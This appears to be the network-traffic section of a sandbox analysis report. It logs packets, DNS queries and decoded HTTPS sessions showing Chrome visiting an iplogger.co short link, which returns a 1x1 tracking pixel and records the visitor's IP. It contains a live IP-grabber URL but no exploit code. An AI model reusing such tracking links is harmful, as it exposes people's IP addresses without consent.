Nov 30, 2024 12:49:03.078569889 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.078620911 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.078986883 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.078996897 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.087281942 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.087318897 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.087372065 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.087477922 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.087490082 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.309000015 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.311963081 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.312048912 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.339874983 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.339900970 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.339926004 CET	49896	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.339941025 CET	443	49896	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.348618031 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.348647118 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:03.348711967 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.379870892 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:03.379885912 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.850037098 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.850563049 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.850598097 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.850858927 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.851056099 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.851063013 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.851274967 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.851331949 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.851597071 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.851608992 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.928073883 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.928545952 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.928565025 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.928904057 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.928909063 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.931788921 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.932030916 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.932049990 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:04.932353020 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:04.932358027 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.099780083 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.102827072 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.102858067 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.103199959 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.103204966 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.294306993 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.294331074 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.294364929 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.294414043 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.294616938 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.294639111 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.294651031 CET	49897	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.294656038 CET	443	49897	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.295120001 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.295175076 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.295247078 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.295402050 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.295427084 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.295453072 CET	49898	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.295468092 CET	443	49898	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.297600031 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297617912 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.297688961 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297708988 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.297728062 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297751904 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297847986 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297863960 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.297883034 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.297895908 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.382198095 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.384649992 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.385863066 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.385951996 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.386282921 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.386292934 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.386315107 CET	49899	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.386320114 CET	443	49899	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.388508081 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.388622046 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.388665915 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.388673067 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.388684034 CET	49900	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.388688087 CET	443	49900	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.389106989 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.389126062 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.389641047 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.389915943 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.389925003 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.391452074 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.391485929 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.391550064 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.391659021 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.391685009 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.534409046 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.537920952 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.537978888 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.538029909 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.538039923 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.538058996 CET	49901	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.538063049 CET	443	49901	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.540467978 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.540484905 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:05.540672064 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.541050911 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:05.541064978 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.013432980 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.013916969 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.013941050 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.014380932 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.014385939 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.077466011 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.077869892 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.077892065 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.078444958 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.078450918 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.138580084 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.139272928 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.139345884 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.139664888 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.139678955 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.194216967 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.195158005 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.195195913 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.196294069 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.196302891 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.324836016 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.325438976 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.325464964 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.326024055 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.326030016 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.447784901 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.451625109 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.452406883 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.452433109 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.452445030 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.452469110 CET	49903	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.452474117 CET	443	49903	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.455543995 CET	49907	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.455636024 CET	443	49907	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.455708981 CET	49907	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.455996037 CET	49907	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.456032038 CET	443	49907	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.526091099 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.529195070 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.529248953 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.529306889 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.529318094 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.529331923 CET	49902	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.529335976 CET	443	49902	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.531546116 CET	49908	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.531562090 CET	443	49908	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.531673908 CET	49908	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.531810999 CET	49908	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.531822920 CET	443	49908	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.575092077 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.575112104 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.575155020 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.575169086 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.575351000 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.575351000 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.575386047 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.575418949 CET	49905	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.575431108 CET	443	49905	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.577394009 CET	49909	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.577409983 CET	443	49909	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.577472925 CET	49909	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.577580929 CET	49909	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.577590942 CET	443	49909	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.638309956 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.641699076 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.641755104 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.641781092 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.641797066 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.641805887 CET	49904	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.641810894 CET	443	49904	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.643714905 CET	49910	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.643727064 CET	443	49910	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.643805981 CET	49910	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.643955946 CET	49910	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.643968105 CET	443	49910	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.769503117 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.772839069 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.772895098 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.772922039 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.772937059 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.772947073 CET	49906	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.772952080 CET	443	49906	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.774745941 CET	49911	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.774758101 CET	443	49911	13.107.246.63	192.168.2.4
Nov 30, 2024 12:49:07.774821997 CET	49911	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.774950027 CET	49911	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:49:07.774960995 CET	443	49911	13.107.246.63	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 12:47:06.805107117 CET	54284	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:06.805150032 CET	53631	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:06.948055983 CET	53	52629	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:07.190859079 CET	53	50543	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:07.190875053 CET	53	54284	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:07.190891981 CET	53	53631	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:09.822484970 CET	53	49893	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:11.281676054 CET	62429	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:11.282016039 CET	60824	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:11.421092987 CET	53	62429	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:11.423357964 CET	53	60824	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:11.485626936 CET	56191	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:11.485873938 CET	54799	53	192.168.2.4	1.1.1.1
Nov 30, 2024 12:47:11.624422073 CET	53	54799	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:11.624762058 CET	53	56191	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:20.946995020 CET	138	138	192.168.2.4	192.168.2.255
Nov 30, 2024 12:47:26.889036894 CET	53	62302	1.1.1.1	192.168.2.4
Nov 30, 2024 12:47:45.579875946 CET	53	49997	1.1.1.1	192.168.2.4
Nov 30, 2024 12:48:06.698477030 CET	53	60536	1.1.1.1	192.168.2.4
Nov 30, 2024 12:48:08.622802973 CET	53	62332	1.1.1.1	192.168.2.4
Nov 30, 2024 12:48:37.078022957 CET	53	51640	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 30, 2024 12:47:07.191071987 CET	192.168.2.4	1.1.1.1	c21b	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2024 12:47:06.805107117 CET	192.168.2.4	1.1.1.1	0x59d6	Standard query (0)	iplogger.co	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:06.805150032 CET	192.168.2.4	1.1.1.1	0xc13e	Standard query (0)	iplogger.co	65	IN (0x0001)	false
Nov 30, 2024 12:47:11.281676054 CET	192.168.2.4	1.1.1.1	0x1870	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:11.282016039 CET	192.168.2.4	1.1.1.1	0x1215	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 30, 2024 12:47:11.485626936 CET	192.168.2.4	1.1.1.1	0xa9d2	Standard query (0)	iplogger.co	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:11.485873938 CET	192.168.2.4	1.1.1.1	0x33be	Standard query (0)	iplogger.co	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 30, 2024 12:47:07.190875053 CET	1.1.1.1	192.168.2.4	0x59d6	No error (0)	iplogger.co	104.21.82.93	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:07.190875053 CET	1.1.1.1	192.168.2.4	0x59d6	No error (0)	iplogger.co	172.67.167.249	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:07.190891981 CET	1.1.1.1	192.168.2.4	0xc13e	No error (0)	iplogger.co		65	IN (0x0001)	false
Nov 30, 2024 12:47:11.421092987 CET	1.1.1.1	192.168.2.4	0x1870	No error (0)	www.google.com	142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:11.423357964 CET	1.1.1.1	192.168.2.4	0x1215	No error (0)	www.google.com		65	IN (0x0001)	false
Nov 30, 2024 12:47:11.624422073 CET	1.1.1.1	192.168.2.4	0x33be	No error (0)	iplogger.co		65	IN (0x0001)	false
Nov 30, 2024 12:47:11.624762058 CET	1.1.1.1	192.168.2.4	0xa9d2	No error (0)	iplogger.co	172.67.167.249	A (IP address)	IN (0x0001)	false
Nov 30, 2024 12:47:11.624762058 CET	1.1.1.1	192.168.2.4	0xa9d2	No error (0)	iplogger.co	104.21.82.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

iplogger.co

https:

fs.microsoft.com

slscr.update.microsoft.com

otelrules.azureedge.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	104.21.82.93	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:09 UTC	660	OUT	GET /1tJFB4 HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-30 11:47:10 UTC	1364	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:47:10 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: 56396975137264100=2; expires=Sun, 30 Nov 2025 11:47:10 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.228; expires=Sun, 30 Nov 2025 11:47:10 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.43326568603515625 expires: Sat, 30 Nov 2024 11:47:10 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E34TOgWh7XNAC1MAFHcJezNiZgpWZLKVL%2FYNZ1p12%2BctjMJm7%2Ba5HH%2FU1ijWNJGrrTBtsfPw5eQHjzf%2BVIt8Kz%2F0olHrBIMC9blNn506Jh0b%2FviSyqnGyo6mByTfGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eaa99e33ed16a4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1739&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1238&delivery_rate=1621321&cwnd=202&unsent_bytes=0&cid=88127d69b7e146a5&ts=825&x=0"
2024-11-30 11:47:10 UTC	5	IN	Data Raw: 37 34 0d 0a 89 Data Ascii: 74
2024-11-30 11:47:10 UTC	117	IN	Data Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-11-30 11:47:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.21.82.93	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:47:10 UTC	639	OUT	GET /favicon.ico HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://iplogger.co/1tJFB4 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 56396975137264100=2; clhf03028ja=8.46.123.228
2024-11-30 11:47:11 UTC	1088	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:47:11 GMT Content-Type: image/x-icon Content-Length: 2833 Connection: close last-modified: Tue, 07 Jun 2022 11:44:38 GMT etag: "629f3a26-b11" strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aCGMAwSbMJEAkg4EFOZa4TA14S2YuEifs%2FItzRysz13NCBIMSo%2BG6hxqoeZFtjSOSKU9E51ve6kMBIlmh5%2BFpFMk7rxybLszCYdyzWPBT632bBK5Hx%2FyE%2BkeiRQZgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eaa99e9092b7ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2033&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1217&delivery_rate=1399808&cwnd=195&unsent_bytes=0&cid=c51c7023db11d027&ts=1700&x=0"
2024-11-30 11:47:11 UTC	281	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}\|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
